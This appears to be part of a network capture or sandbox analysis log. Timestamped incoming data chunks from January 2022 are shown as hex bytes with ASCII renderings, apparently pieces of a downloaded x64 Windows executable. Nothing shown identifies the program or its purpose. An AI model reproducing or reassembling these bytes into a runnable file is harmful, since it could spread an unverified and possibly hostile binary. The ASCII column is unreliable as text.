24 38 44 88 74 24 30 89 5c 24 28 89 6c 24 20 89 f2 41 89 c0 41 b9 04 00 00 00 e8 d0 c1 Data Ascii: =jt\EL5fL%gID=A41ML9%11AAD!ADAAD-f)EI+DA-;)I+nHGD\|$@@\|$8Dt$0\$(l$ AA
2022-01-30 12:43:46 UTC	1275	IN	Data Raw: ed 74 42 41 0f ba e2 08 72 32 48 8d 57 df 48 83 fa 0d 89 44 24 58 0f 87 55 01 00 00 b9 60 00 00 00 48 8d 2d bd 13 00 00 48 63 54 95 00 48 01 ea ff e2 b9 69 00 00 00 e9 29 02 00 00 89 44 24 58 e9 2f 02 00 00 48 8b 0d 95 a4 06 00 80 b9 89 01 00 00 00 74 1f 8a 4c 24 57 f6 d1 8b 54 24 5c 83 fa 02 41 0f 95 c1 31 c0 44 84 c9 75 96 83 fa 03 75 0d eb 8f 83 7c 24 5c 03 75 04 31 c0 eb 84 45 85 c0 0f 95 c1 41 08 cd 31 c0 41 80 fd 01 75 0f 44 89 d1 81 e1 00 01 00 00 0f 84 6b ff ff ff c7 44 24 58 00 00 00 00 e9 c8 01 00 00 85 ed 0f 84 5a 01 00 00 83 fd 03 75 0d e8 92 6c 00 00 84 c0 0f 84 48 01 00 00 31 c9 e8 d3 63 00 00 e8 0c 61 00 00 e9 60 11 00 00 45 89 f0 41 c1 e8 10 44 89 84 24 28 01 00 00 48 8b 0d f4 a3 06 00 ba 01 00 00 00 e8 38 93 fe ff 80 3d 36 ac 06 00 01 75 Data Ascii: tBAr2HWHD$XU`H-HcTHi)D$X/HtL$WT$\A1Duu\|$\u1EA1AuDkD$XZulH1ca`EAD$(H8=6u
2022-01-30 12:43:46 UTC	1283	IN	Data Raw: 66 41 0f ef c8 66 41 0f 6f fa 66 0f 66 f9 66 41 0f 76 ca 66 0f 70 f1 f5 66 0f db f7 66 0f 70 cf f5 66 0f eb ce 66 0f 7e ca f6 c2 01 74 05 c6 44 88 07 04 66 0f 73 d9 06 66 0f 7e ca c1 ea 10 f6 c2 01 74 05 c6 44 88 0b 04 66 0f 6f ca 66 41 0f ef c8 66 41 0f 6f f2 66 0f 66 f1 66 41 0f 76 ca 66 0f 70 f9 f5 66 0f db fe 66 0f 70 ce f5 66 0f eb cf 66 0f c5 d1 00 f6 c2 01 74 05 c6 44 88 0f 04 66 0f c5 d1 04 f6 c2 01 74 05 c6 44 88 13 04 66 0f 6f cc 66 41 0f ef c8 66 41 0f 6f fa 66 0f 66 f9 66 0f 70 f7 44 66 41 0f 76 ca 66 0f 70 e9 55 66 0f db ee 66 0f 70 f7 55 66 0f eb f5 66 0f c5 d6 04 f6 c2 01 74 05 c6 44 88 17 04 66 0f 70 c9 f5 66 0f db cf 66 0f 70 ef f5 66 0f eb e9 66 0f c5 d5 04 f6 c2 01 74 05 c6 44 88 1b 04 66 0f 6f c8 66 41 0f ef c8 66 41 0f 6f ea 66 0f 66 Data Ascii: fAfAofffAvfpffpff~tDfsf~tDfofAfAofffAvfpffpfftDftDfofAfAofffpDfAvfpUffpUfftDfpffpfftDfofAfAoff
2022-01-30 12:43:46 UTC	1290	IN	Data Raw: c0 e8 64 fc fe ff 48 85 c0 74 14 44 8b 00 48 8b 4c 24 50 48 8d 15 6a 5f 05 00 e8 60 0c ff ff 89 5c 24 5c 89 7c 24 68 48 8b 5c 24 70 eb 30 85 ff 78 0c 89 f8 44 8b 84 84 30 01 00 00 eb 03 45 31 c0 48 8b 4c 24 50 48 8d 15 37 5f 05 00 e8 2d 0c ff ff c7 44 24 5c ff ff ff ff 89 7c 24 68 39 6c 24 64 75 07 44 39 74 24 60 74 76 41 83 fe ff 74 40 44 89 b4 24 04 01 00 00 48 8b 8c 24 a0 00 00 00 48 8d 94 24 00 01 00 00 45 31 c0 e8 d9 fb fe ff 48 85 c0 74 14 44 8b 00 48 8b 4c 24 50 48 8d 15 d1 5e 05 00 e8 d5 0b ff ff 44 89 74 24 60 eb 2c 85 ed 78 0c 89 e8 44 8b 84 84 30 01 00 00 eb 03 45 31 c0 48 8b 4c 24 50 48 8d 15 a6 5e 05 00 e8 aa 0b ff ff c7 44 24 60 ff ff ff ff 89 6c 24 64 41 81 e5 00 00 08 00 44 39 bc 24 84 00 00 00 74 46 31 c0 45 85 ff 48 8d 0d b2 5e 05 00 48 Data Ascii: dHtDHL$PHj_`\$\\|$hH\$p0xD0E1HL$PH7_-D$\\|$h9l$duD9t$`tvAt@D$H$H$E1HtDHL$PH^Dt$`,xD0E1HL$PH^D$`l$dAD9$tF1EH^H
2022-01-30 12:43:46 UTC	1298	IN	Data Raw: 4c 8b bc 24 f0 00 00 00 44 8b 6c 24 4c 8b bc 24 e8 00 00 00 83 3d e6 47 06 00 01 44 8b b4 24 8c 00 00 00 44 8b 64 24 74 75 76 8b 44 24 48 25 00 00 04 00 74 6b 48 8b 0d a5 47 06 00 ba 01 00 00 00 ff 15 8a cf 05 00 31 c9 48 8b 05 11 4e 06 00 41 83 fd 03 75 06 8b 0d 99 46 06 00 44 8b 44 24 64 41 29 c8 ff cf 48 8b 0d 74 47 06 00 48 8b 54 24 78 48 89 54 24 38 48 8b 54 24 50 89 54 24 30 48 89 44 24 28 48 8d 84 24 00 01 00 00 48 89 44 24 20 89 fa 41 b9 04 00 00 00 ff 15 69 ce 05 00 48 8b 0d 3a 47 06 00 ba 01 00 00 00 ff 15 1f cf 05 00 4c 8b 44 24 68 48 8b 84 24 a8 00 00 00 4d 8d 04 40 8b 84 24 ec 00 00 00 41 0f af c6 41 01 c7 31 c0 44 2b 64 24 50 0f 8f 67 f6 ff ff 41 83 fd 02 74 4a 80 bc 24 e4 00 00 00 00 75 14 80 3d 10 47 06 00 00 75 37 8b 44 24 48 25 00 00 08 Data Ascii: L$Dl$L$=GD$Dd$tuvD$H%tkHG1HNAuFDD$dA)HtGHT$xHT$8HT$PT$0HD$(H$HD$ AiH:GLD$hH$M@$AA1D+d$PgAtJ$u=Gu7D$H%
2022-01-30 12:43:46 UTC	1306	IN	Data Raw: 00 48 8b 4c 24 60 48 31 e1 e8 23 c2 00 00 89 e8 48 83 c4 68 5b 5d 5f 5e 41 5e 41 5f c3 56 57 48 83 ec 68 48 8b 05 b7 02 06 00 48 31 e0 48 89 44 24 60 48 85 d2 74 65 48 89 d6 c7 02 00 00 00 00 48 8d 44 24 40 48 8d 54 24 30 48 89 42 08 48 b9 00 00 00 00 02 00 00 00 48 89 0a c7 40 04 01 00 00 00 41 8b 08 89 08 49 8b 48 08 48 89 48 08 c7 40 14 02 00 00 00 41 8b 09 89 48 10 49 8b 49 08 48 89 48 18 48 8d 4e 18 4c 8d 4c 24 2c 45 31 c0 ff 15 63 30 06 00 89 c7 89 06 eb 05 bf 06 00 00 00 48 8b 4c 24 60 48 31 e1 e8 83 c1 00 00 89 f8 48 83 c4 68 5f 5e c3 48 83 ec 28 48 8b 4a 08 e8 3f a5 f9 ff 31 c0 48 83 c4 28 c3 cc cc 56 48 83 ec 20 48 85 d2 74 29 4c 89 c6 8b 0a 8d 81 00 fd f6 7f 83 f8 11 77 20 48 8d 0d 8b 00 00 00 48 63 04 81 48 01 c8 ff e0 48 8d 0d 57 f8 04 00 eb Data Ascii: HL$`H1#Hh[]_^A^A_VWHhHH1HD$`HteHHD$@HT$0HBHH@AIHHH@AHIIHHHNLL$,E1c0HL$`H1Hh_^H(HJ?1H(VH Ht)Lw HHcHHW
2022-01-30 12:43:46 UTC	1314	IN	Data Raw: f9 ff 48 89 f1 48 83 c4 20 5e e9 b4 86 f9 ff 48 8b 12 48 8b 49 08 e9 e8 81 f9 ff 56 57 48 83 ec 28 48 8b 49 20 e8 e0 83 f9 ff 48 89 c6 b9 01 00 00 00 ba 08 00 00 00 45 31 c0 e8 0a 86 f9 ff 48 89 c7 48 89 f1 e8 bc a9 fe ff 48 89 07 48 89 f8 48 83 c4 28 5f 5e c3 56 48 83 ec 20 0f be f1 48 8d 0d 20 e6 04 00 41 b8 0a 00 00 00 89 f2 e8 7e b2 00 00 48 85 c0 40 0f b6 ce b8 2e 00 00 00 0f 44 c1 48 83 c4 20 5e c3 56 57 48 83 ec 38 48 8b 05 0c e3 05 00 48 31 e0 48 89 44 24 30 80 3d a5 19 06 00 00 74 09 48 8b 35 94 19 06 00 eb 45 48 8d 0d ca 65 04 00 e8 08 01 00 00 48 89 c6 48 8d 0d 8d 65 04 00 e8 f9 00 00 00 48 85 f6 74 15 48 8d 15 9b b9 04 00 48 89 f1 ff 15 4a 97 05 00 48 89 c6 eb 02 31 f6 48 89 35 54 19 06 00 c6 05 55 19 06 00 01 48 85 f6 74 5d 48 8d 7c 24 2c c7 Data Ascii: HH ^HHIVWH(HI HE1HHHHH(_^VH H A~H@.DH ^VWH8HH1HD$0=tH5EHeHHeHtHHJH1H5TUHt]H\|$,
2022-01-30 12:43:46 UTC	1322	IN	Data Raw: ff 0f 85 22 01 00 00 e9 37 02 00 00 85 ff 75 5f 49 8b 44 24 60 48 85 c0 74 61 83 fb 17 0f 85 af 00 00 00 66 c7 84 24 70 02 00 00 17 00 41 0f b7 4c 24 70 ff 15 b8 fb 05 00 66 89 84 24 72 02 00 00 49 8b 44 24 60 48 8b 40 20 0f 10 40 08 0f 11 84 24 78 02 00 00 8b 48 04 89 8c 24 74 02 00 00 8b 40 18 89 84 24 88 02 00 00 e9 8f 00 00 00 89 f9 e8 bf f1 ff ff e9 9b 00 00 00 49 8b 54 24 58 48 8b 42 20 48 85 c0 74 0a 41 8b 4c 24 68 3b 4a 28 7c 27 48 8d 0d 51 f3 04 00 48 8d 15 12 01 05 00 41 b8 fa 03 00 00 e8 6d 42 01 00 49 8b 44 24 58 48 8b 40 20 41 8b 4c 24 68 66 c7 84 24 60 02 00 00 02 00 48 63 c9 8b 0c 88 ff 15 19 fb 05 00 eb 11 66 c7 84 24 60 02 00 00 02 00 48 8b 40 20 8b 40 04 89 84 24 64 02 00 00 41 0f b7 4c 24 70 ff 15 fb fa 05 00 66 89 84 24 62 02 00 00 4c Data Ascii: "7u_ID$`Htaf$pAL$pf$rID$`H@ @$xH$t@$IT$XHB HtAL$h;J(\|'HQHAmBID$XH@ AL$hf$`Hcf$`H@ @$dAL$pf$bL
2022-01-30 12:43:46 UTC	1329	IN	Data Raw: 84 c0 0f 84 68 01 00 00 e8 4c 0c 00 00 48 85 c0 0f 84 56 01 00 00 48 89 c7 ba 28 00 00 00 b9 40 00 00 00 ff 15 a0 5a 05 00 48 85 c0 0f 84 3a 01 00 00 48 89 c5 48 89 c1 ba 01 00 00 00 ff 15 16 e4 05 00 85 c0 0f 84 18 01 00 00 48 89 e9 48 89 fa 45 31 c0 ff 15 07 e4 05 00 85 c0 0f 84 01 01 00 00 c7 44 24 58 18 00 00 00 c7 44 24 68 01 00 00 00 48 89 6c 24 60 48 8d 54 24 58 e9 ef 00 00 00 4d 85 e4 74 63 45 31 ed b9 01 00 00 00 ba 28 00 00 00 45 31 c0 e8 2e 47 f9 ff 48 89 c6 48 8d 15 62 02 00 00 48 89 e9 49 89 c0 45 31 c9 e8 4e a3 ff ff 48 89 06 48 89 6e 08 e8 e7 6e fe ff 48 89 46 10 4c 89 66 18 48 8b 84 24 e0 04 00 00 48 89 46 20 48 c7 c5 ff ff ff ff 48 8b 5c 24 38 48 8b 7c 24 40 e9 77 fe ff ff e8 b8 6e fe ff 49 89 c5 48 8d 7c 24 70 48 8d 5c 24 54 4c 8b 25 27 Data Ascii: hLHVH(@ZH:HHHHE1D$XD$hHl$`HT$XMtcE1(E1.GHHbHIE1NHHnnHFLfH$HF HH\$8H\|$@wnIH\|$pH\$TL%'
2022-01-30 12:43:46 UTC	1337	IN	Data Raw: 48 89 c6 48 8b 44 24 20 48 89 06 eb 02 31 f6 48 8b 4c 24 30 48 31 e1 e8 15 45 00 00 48 89 f0 48 83 c4 38 5f 5e c3 41 57 41 56 56 57 53 48 83 ec 40 48 8b 05 a9 85 05 00 48 31 e0 48 89 44 24 38 48 85 c9 0f 84 b5 00 00 00 48 89 d7 48 89 cb 48 8b 09 4c 8d 7c 24 30 4c 89 7c 24 28 48 c7 44 24 20 00 00 00 00 31 f6 4c 8d 4c 24 34 45 31 c0 ff 15 0c 38 05 00 85 c0 0f 85 83 00 00 00 83 7c 24 34 01 75 7c 44 8b 74 24 30 41 ff c6 ba 01 00 00 00 4c 89 f1 45 31 c0 e8 ed 27 f9 ff 48 89 c6 48 8b 0b 4c 89 7c 24 28 48 89 44 24 20 4c 8d 4c 24 34 48 89 fa 45 31 c0 ff 15 c4 37 05 00 85 c0 75 35 83 7c 24 34 01 75 2e 8b 44 24 30 44 39 f0 72 1d 48 8d 0d 43 bd 04 00 48 8d 15 18 c7 04 00 41 b8 92 00 00 00 e8 af 03 01 00 8b 44 24 30 89 c0 c6 04 06 00 eb 0a 48 89 f1 e8 05 28 f9 ff 31 Data Ascii: HHD$ H1HL$0H1EHH8_^AWAVVWSH@HH1HD$8HHHHL\|$0L\|$(HD$ 1LL$4E18\|$4u\|Dt$0ALE1'HHL\|$(HD$ LL$4HE17u5\|$4u.D$0D9rHCHAD$0H(1
2022-01-30 12:43:46 UTC	1345	IN	Data Raw: 28 89 d9 ff 15 50 1a 05 00 85 c0 74 25 bf fd ff ff ff 83 7c 24 28 01 77 1e 89 df 83 fb ff 75 17 31 ff 80 3e 00 40 0f 94 c7 83 cf fe eb 09 89 df eb 05 bf fe ff ff ff 48 8b 4c 24 40 48 31 e1 e8 ad 25 00 00 89 f8 48 83 c4 48 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 57 41 56 41 54 56 57 55 53 48 83 ec 40 48 89 d6 48 8b 05 32 66 05 00 48 31 e0 48 89 44 24 38 31 db 45 85 c0 40 0f 95 c5 45 31 f6 41 83 f8 02 41 0f 95 c6 41 c1 e6 07 41 83 ee 80 85 c9 74 3d 41 89 cf 83 f9 01 74 3d 41 81 ff e9 fd 00 00 75 3d 44 89 f0 66 0f 6f 05 be 38 03 00 31 c9 66 0f 6f 0d 94 cf 02 00 f3 0f 7f 04 4e 48 83 c1 08 66 0f fd c1 48 39 c8 75 ee e9 dd 00 00 00 ff 15 77 19 05 00 eb 06 ff 15 37 1a 05 00 41 89 c7 41 8d 47 ff 3d fe ff 00 00 77 56 40 88 eb 8d 1c 9d 08 00 00 00 44 89 f5 31 ff Data Ascii: (Pt%\|$(wu1>@HL$@H1%HH[]_^A\A]A^A_AWAVATVWUSH@HH2fH1HD$81E@E1AAAAt=At=Au=Dfo81foNHfH9uw7AAG=wV@D1
2022-01-30 12:43:46 UTC	1353	IN	Data Raw: 96 48 89 fa 48 29 c2 0f b6 6a 97 c1 e5 08 41 8d 0c 28 89 4f c4 0f b6 44 38 98 0f b6 52 99 c1 e2 08 8d 0c 02 89 4f cc 41 8d 0c 28 83 c1 03 83 e1 fc 89 4f c8 01 d0 83 c0 03 83 e0 fc 89 47 d0 48 83 c9 01 ba 01 00 00 00 45 31 c0 e8 b9 e9 f8 ff 48 89 47 b0 48 63 4f d0 ba 01 00 00 00 45 31 c0 e8 a4 e9 f8 ff 48 89 47 b8 48 85 f6 74 65 48 63 47 c0 8b 4f c8 83 c1 0c 39 c8 7d 40 48 8d 6b 01 8d 48 01 8a 13 48 8b 5f b0 89 4f c0 88 54 18 f4 48 89 eb 48 ff ce 75 d6 eb 3c 48 8d 6b 01 8d 50 01 29 c8 83 c0 f4 8a 0b 48 8b 5f b8 89 57 c0 48 98 88 0c 03 48 89 eb 48 ff ce 74 1a 8b 47 c0 8b 4f c8 8b 57 d0 01 ca 83 c2 0c 39 d0 7c cc 48 89 dd eb 05 48 89 dd 31 f6 8b 47 c8 8b 4f d0 01 c8 83 c0 0c 39 47 c0 0f 8c fa 01 00 00 4c 8d 77 90 41 80 7e 44 00 74 18 48 8b 4f f0 48 8b 01 48 Data Ascii: HH)jA(OD8ROA(OGHE1HGHcOE1HGHteHcGO9}@HkHH_OTHHu<HkP)H_WHHHtGOW9\|HH1GO9GLwA~DtHOHH
2022-01-30 12:43:46 UTC	1361	IN	Data Raw: 0f 74 02 66 0f d7 c8 66 0f 70 d9 00 66 0f 6f c3 66 41 0f 74 02 66 0f d7 d0 41 23 d1 41 23 c9 75 2e 0f bd ca 66 0f 6f ca 66 0f 6f c3 49 03 ca 85 d2 4c 0f 45 c1 49 83 c2 10 66 41 0f 74 0a 66 41 0f 74 02 66 0f d7 c9 66 0f d7 d0 85 c9 74 d2 8b c1 f7 d8 23 c1 ff c8 23 d0 0f bd ca 49 03 ca 85 d2 4c 0f 45 c1 49 8b c0 48 83 c4 18 c3 41 0f be 01 49 8b c9 3b c2 49 0f 45 c8 41 80 39 00 4c 8b c1 74 2e 49 ff c1 41 f6 c1 0f 75 e1 0f b6 c2 66 0f 6e c0 66 41 0f 3a 63 01 40 73 0d 4c 63 c1 4d 03 c1 66 41 0f 3a 63 01 40 74 ba 49 83 c1 10 eb e2 48 8b c1 eb b2 cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 10 40 8a 3a 48 8b da 4c 8b c1 40 84 ff 75 08 48 8b c1 e9 cb 01 00 00 83 3d 5c 27 05 00 02 41 ba ff 0f 00 00 45 8d 5a f1 0f 8d d4 00 00 00 40 0f b6 c7 0f 57 d2 8b c8 c1 Data Ascii: tffpfofAtfA#A#u.fofoILEIfAtfAtfft##ILEIHAI;IEA9Lt.IAufnfA:c@sLcMfA:c@tIHH\$Ht$WH@:HL@uH=\'AEZ@W
2022-01-30 12:43:46 UTC	1368	IN	Data Raw: 80 68 04 00 00 48 ff 00 49 8b 40 18 8a 08 48 ff c0 41 88 48 41 49 89 40 18 84 c9 75 14 e8 0b 7b 00 00 c7 00 16 00 00 00 e8 80 ff 00 00 32 c0 eb 02 b0 01 48 83 c4 28 c3 cc 48 89 5c 24 10 48 89 6c 24 18 56 57 41 56 48 83 ec 20 48 8b 59 10 4c 8b f2 48 8b f9 48 85 db 75 0c e8 ce 7a 00 00 48 8b d8 48 89 47 10 8b 2b 48 8d 54 24 40 83 23 00 be 01 00 00 00 48 8b 4f 18 48 83 64 24 40 00 48 2b ce 44 8d 46 09 e8 36 d2 00 00 41 89 06 48 8b 47 10 48 85 c0 75 09 e8 91 7a 00 00 48 89 47 10 83 38 22 74 11 48 8b 44 24 40 48 3b 47 18 72 06 48 89 47 18 eb 03 40 32 f6 83 3b 00 75 06 85 ed 74 02 89 2b 48 8b 5c 24 48 40 8a c6 48 8b 6c 24 50 48 83 c4 20 41 5e 5f 5e c3 cc cc cc 48 83 ec 28 8a 41 41 3c 46 75 19 f6 01 08 0f 85 58 01 00 00 c7 41 2c 07 00 00 00 48 83 c4 28 e9 50 01 Data Ascii: hHI@HAHAI@u{2H(H\$Hl$VWAVH HYLHHuzHHG+HT$@#HOHd$@H+DF6AHGHuzHG8"tHD$@H;GrHG@2;ut+H\$H@Hl$PH A^_^H(AA<FuXA,H(P
2022-01-30 12:43:46 UTC	1376	IN	Data Raw: 30 02 00 00 48 81 c4 48 02 00 00 41 5e 5e c3 cc cc 48 83 ec 38 80 79 08 00 74 08 48 8b 01 48 83 c4 38 c3 48 83 64 24 20 00 4c 8d 05 a1 85 04 00 41 b9 9f 01 00 00 48 8d 15 04 86 04 00 48 8d 0d 3d 75 04 00 e8 44 e0 00 00 cc cc cc cc 48 83 ec 38 80 79 08 00 75 08 48 8b 01 48 83 c4 38 c3 48 83 64 24 20 00 4c 8d 05 65 85 04 00 41 b9 a5 01 00 00 48 8d 15 18 84 04 00 48 8d 0d e9 74 04 00 e8 08 e0 00 00 cc cc cc cc 48 89 5c 24 18 89 54 24 10 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 30 83 64 24 70 00 48 8b c1 48 8b d9 48 c1 e8 20 b9 ff ff ff ff 45 8a d1 41 8a f0 44 8b da 48 3b d9 76 10 0f bd c8 74 04 ff c1 eb 02 33 c9 83 c1 20 eb 0b 0f bd cb 74 04 ff c1 eb 02 33 c9 4c 8b bc 24 90 00 00 00 41 8b fb 41 8a 57 08 8a c2 f6 d8 8a c2 45 1b f6 41 83 e6 1d 41 83 c6 18 44 Data Ascii: 0HHA^^H8ytHH8Hd$ LAHH=uDH8yuHH8Hd$ LeAHHtH\$T$UVWATAUAVAWH0d$pHHH EADH;vt3 t3L$AAWEAAD
2022-01-30 12:43:46 UTC	1384	IN	Data Raw: 7e 48 8b 7c 24 50 8b 5c 24 40 44 8b 64 24 38 45 3b d8 72 5d 41 8b c3 41 2b c0 8d 48 ff 41 3b c7 73 0a 44 8b 94 85 24 03 00 00 eb 03 45 33 d2 41 3b cf 73 09 8b 94 8d 24 03 00 00 eb 02 33 d2 41 23 d4 41 8b c3 8b cb 44 23 d7 d3 ea 8b ce 41 d3 e2 41 0b d2 89 94 85 24 03 00 00 b8 ff ff ff ff 44 03 d8 44 3b d8 74 09 44 8b bd 20 03 00 00 eb 9e 8b 7c 24 30 bb 72 00 00 00 44 8b 64 24 34 33 c9 45 85 c0 74 0f 83 a4 8d 24 03 00 00 00 ff c1 41 3b c8 75 f1 41 3b f4 41 8d 41 01 45 8b f9 44 0f 47 f8 33 f6 44 89 bd 20 03 00 00 eb 2a 33 f6 4c 8d 45 84 45 33 c9 89 75 80 ba cc 01 00 00 89 b5 20 03 00 00 48 8d 8d 24 03 00 00 e8 bc d9 ff ff 44 8b bd 20 03 00 00 41 bb ff ff ff ff 41 bc 20 00 00 00 8b 4c 24 48 8b 44 24 3c 2b c8 89 4c 24 48 44 8b d1 85 c0 74 27 3b f9 76 20 48 8b Data Ascii: ~H\|$P\$@Dd$8E;r]AA+HA;sD$E3A;s$3A#AD#AA$DD;tD \|$0rDd$43Et$A;uA;AAEDG3D *3LEE3u H$D AA L$HD$<+L$HDt';v H
2022-01-30 12:43:46 UTC	1392	IN	Data Raw: 00 00 00 85 c9 0f 84 bf 00 00 00 83 e9 01 0f 84 9a 00 00 00 83 e9 01 74 78 83 e9 01 74 36 83 f9 01 0f 85 89 01 00 00 8a 82 08 03 00 00 f6 d8 48 b8 00 00 00 00 00 00 00 80 48 1b c9 48 23 c8 48 b8 ff ff ff ff ff ff ff 7f 48 03 c8 49 89 08 e9 70 01 00 00 8a 82 08 03 00 00 48 ba 00 00 00 00 00 00 f0 7f f6 d8 48 b8 00 00 00 00 00 00 00 80 48 1b c9 48 23 c8 48 b8 00 00 00 00 00 00 f0 ff 48 03 ca 48 23 c8 49 8b 00 48 23 c2 48 0b c8 eb bb 8a 82 08 03 00 00 f6 d8 48 b8 00 00 00 00 00 00 00 80 48 1b c9 48 23 c8 48 23 c8 eb 9e 48 8d 54 24 20 4c 89 44 24 20 49 8b c9 c6 44 24 28 01 e8 d8 e3 ff ff e9 fc 00 00 00 48 8d 54 24 20 4c 89 44 24 20 49 8b c9 c6 44 24 28 01 e8 38 c6 ff ff e9 e0 00 00 00 8a 82 08 03 00 00 48 ba 00 00 00 00 00 00 f0 7f f6 d8 48 b8 00 00 00 00 00 Data Ascii: txt6HHH#HHIpHHHH#HHH#IH#HHHH#H#HT$ LD$ ID$(HT$ LD$ ID$(8HH
2022-01-30 12:43:46 UTC	1400	IN	Data Raw: 2d d3 04 00 74 04 33 c0 eb 48 e8 5e 77 00 00 e8 f9 b6 00 00 48 8b d8 48 85 c0 75 05 83 cf ff eb 27 48 8b cb e8 b0 00 00 00 48 85 c0 75 05 83 cf ff eb 0e 48 89 05 0f d3 04 00 48 89 05 f0 d2 04 00 33 c9 e8 69 81 00 00 48 8b cb e8 61 81 00 00 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 48 83 ec 28 48 8b 09 48 3b 0d de d2 04 00 74 05 e8 23 00 00 00 48 83 c4 28 c3 cc cc 48 83 ec 28 48 8b 09 48 3b 0d ba d2 04 00 74 05 e8 07 00 00 00 48 83 c4 28 c3 cc cc 48 85 c9 74 3b 48 89 5c 24 08 57 48 83 ec 20 48 8b 01 48 8b d9 48 8b f9 eb 0f 48 8b c8 e8 fa 80 00 00 48 8d 7f 08 48 8b 07 48 85 c0 75 ec 48 8b cb e8 e6 80 00 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 56 41 57 48 83 ec 30 4c 8b f1 33 f6 8b ce 4d 8b c6 41 8a 16 eb Data Ascii: -t3H^wHHu'HHuHH3iHaH\$0H _H(HH;t#H(H(HH;tH(Ht;H\$WH HHHHHHHuHH\$0H _H\$Hl$Ht$WAVAWH0L3MA
2022-01-30 12:43:46 UTC	1408	IN	Data Raw: 44 88 11 49 83 f9 04 75 d4 41 b0 01 41 8a c0 c3 cc 48 83 ec 38 48 83 64 24 28 00 48 8d 54 24 20 48 89 4c 24 20 41 b1 01 33 c9 41 b8 0a 00 00 00 e8 08 00 00 00 48 83 c4 38 c3 cc cc cc 48 89 5c 24 08 48 89 74 24 18 55 57 41 54 41 56 41 57 48 8b ec 48 83 ec 40 48 83 3a 00 41 8a f9 45 8b f8 48 8b da 75 26 e8 83 de ff ff c7 00 16 00 00 00 e8 f8 62 00 00 48 8b 4b 08 48 85 c9 74 06 48 8b 03 48 89 01 33 c0 e9 d3 02 00 00 45 85 ff 74 09 41 8d 40 fe 83 f8 22 77 cc 48 8b d1 48 8d 4d e0 e8 a8 48 ff ff 4c 8b 23 45 33 f6 48 8b 55 e8 41 8a 34 24 4d 8d 44 24 01 4c 89 03 83 7a 08 01 7e 1b 40 0f b6 ce 4c 8d 45 e8 ba 08 00 00 00 e8 16 81 00 00 4c 8b 03 48 8b 55 e8 eb 0e 48 8b 02 40 0f b6 ce 0f b7 04 48 83 e0 08 85 c0 74 0c 48 8b 03 40 8a 30 4c 8d 40 01 eb be 40 0f b6 c7 8b Data Ascii: DIuAAH8Hd$(HT$ HL$ A3AH8H\$Ht$UWATAVAWHH@H:AEHu&bHKHtHH3EtA@"wHHMHL#E3HUA4$MD$Lz~@LELHUH@HtH@0L@@
2022-01-30 12:43:46 UTC	1415	IN	Data Raw: f9 ff ff 00 00 76 39 48 83 fd 01 76 47 81 c1 00 00 ff ff 41 b8 00 d8 00 00 8b c1 89 4c 24 50 c1 e8 0a 48 ff cd 66 41 0b c0 66 89 03 b8 ff 03 00 00 66 23 c8 48 83 c3 02 b8 00 dc 00 00 66 0b c8 66 89 0b 48 03 fa 48 83 c3 02 48 83 ed 01 0f 85 5f ff ff ff 49 2b df 49 89 3e 48 d1 fb 48 8b c3 eb 1b 49 8b fd 66 44 89 2b eb e9 49 89 3e e8 3a bf ff ff c7 00 2a 00 00 00 48 83 c8 ff 48 8b 5c 24 58 48 8b 6c 24 60 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 49 8b dd 44 38 2f 75 08 41 b8 01 00 00 00 eb 1d 44 38 6f 01 75 08 41 b8 02 00 00 00 eb 0f 8a 47 02 f6 d8 4d 1b c0 49 f7 d8 49 83 c0 03 4d 8b cc 48 8b d7 33 c9 e8 06 aa 00 00 48 83 f8 ff 74 99 48 85 c0 74 83 48 83 f8 04 75 03 48 ff c3 48 03 f8 48 ff c3 eb ad cc cc cc cc cc cc 41 54 41 55 41 56 48 81 ec 50 04 00 00 48 Data Ascii: v9HvGAL$PHfAff#HffHHH_I+I>HHIfD+I>:*HH\$XHl$`H A_A^A]A\_ID8/uAD8ouAGMIIMH3HtHtHuHHHATAUAVHPH
2022-01-30 12:43:46 UTC	1423	IN	Data Raw: 04 00 ff 75 07 33 c0 e9 89 00 00 00 ff 15 47 e2 03 00 8b 0d 49 2e 04 00 8b f8 e8 b6 01 00 00 48 83 ca ff 33 f6 48 3b c2 74 60 48 85 c0 74 05 48 8b f0 eb 56 8b 0d 27 2e 04 00 e8 de 01 00 00 85 c0 74 47 ba 78 00 00 00 8d 4a 89 e8 dd 89 00 00 8b 0d 0b 2e 04 00 48 8b d8 48 85 c0 74 12 48 8b d0 e8 b7 01 00 00 85 c0 75 0f 8b 0d f1 2d 04 00 33 d2 e8 a6 01 00 00 eb 09 48 8b cb 48 8b de 48 8b f1 48 8b cb e8 2f d8 ff ff 8b cf ff 15 17 e4 03 00 48 8b c6 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 48 83 ec 28 48 85 c9 74 11 48 8d 05 4c 75 04 00 48 3b c8 74 05 e8 fa d7 ff ff 48 83 c4 28 c3 cc 40 53 48 83 ec 20 33 db 48 8d 15 a5 75 04 00 45 33 c0 48 8d 0c 9b 48 8d 0c ca ba a0 0f 00 00 e8 88 01 00 00 85 c0 74 11 ff 05 ae 75 04 00 ff c3 83 fb 01 72 d3 b0 01 eb 07 e8 Data Ascii: u3GI.H3H;t`HtHV'.tGxJ.HHtHu-3HHHH/HH\$0Ht$8H _H(HtHLuH;tH(@SH 3HuE3HHtur
2022-01-30 12:43:46 UTC	1431	IN	Data Raw: 70 49 03 c0 0f 11 49 f0 48 83 ea 01 75 b6 0f 10 00 0f 11 01 0f 10 48 10 0f 11 49 10 48 8b 40 20 48 89 41 20 8b cf 21 13 48 8b d3 e8 9d fa ff ff 8b f8 83 f8 ff 75 25 e8 f1 80 ff ff c7 00 16 00 00 00 83 cf ff 48 8b cb e8 64 04 00 00 8b c7 48 8b 5c 24 60 48 83 c4 40 5f 5e 5d c3 40 84 f6 75 05 e8 77 77 ff ff 48 8b 45 30 48 8b 88 88 00 00 00 83 c8 ff f0 0f c1 01 83 f8 01 75 1c 48 8b 45 30 48 8b 88 88 00 00 00 48 8d 05 e2 0f 04 00 48 3b c8 74 05 e8 18 04 00 00 c7 03 01 00 00 00 48 8b cb 48 8b 45 30 33 db 48 89 88 88 00 00 00 48 8b 45 30 f6 80 a8 03 00 00 02 75 89 f6 05 0e 17 04 00 01 75 80 48 8d 45 30 48 89 45 